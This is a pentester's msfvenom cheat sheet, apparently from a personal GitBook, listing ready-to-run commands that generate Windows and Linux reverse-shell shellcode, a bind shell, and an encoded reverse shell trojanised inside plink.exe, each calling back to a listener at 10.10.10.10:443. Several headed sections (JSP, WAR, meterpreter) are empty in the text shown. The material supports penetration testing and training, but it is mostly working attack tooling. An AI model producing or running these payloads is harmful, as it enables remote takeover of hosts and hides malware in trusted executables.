search

MSFvenom Cheetsheet

My various MSFvenom commands to generate shellcode, reverse shells, and meterpreter payloads that I end up using over, and over, and over, and over...

hashtag
Shellcode Generation

hashtag
Generic Shellcode

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none

hashtag
Windows Reverse TCP Shell (Shellcode x86)

Only use this one if payload size is no problem and you can't determine the bad chars:

`msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"`

hashtag
Windows Reverse TCP Shell Embedded in `plink.exe`

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o burmat_embedded.exe

hashtag
Bind Shell Shellcode

msfvenom -p windows/shell_bind_tcp RHOST=10.11.11.11 LPORT=1337 -b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' -f python

hashtag
Reverse Shells

Oddball reverse shells that can trip you up. Those "Wait, I have done this before?" moments. Like when you see Tomcat running with default credentials or a ColdFusion Site (fuck me...)

hashtag
JSP Reverse Shell

hashtag
JavaScript Reverse Shells

If you are attacking a Windows host:

If you are attacking a Linux host: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 CMD=/bin/bash -f js_le -e generic/none

hashtag
WAR (Java) Reverse Shell

hashtag
Meterpreter Payloads

Don't just copy and paste - learn and understand the syntax. These will all be for x86 machines, so just swap it up to x64 to suite your needs.

hashtag
Windows Meterpreter Payload

hashtag
Windows Meterpreter Reverse HTTPS Payload (x86)

hashtag
Linux Meterpreter Stager

PreviousOne-Liners and Dirty ScriptsNextWeb Application Hacking

Last updated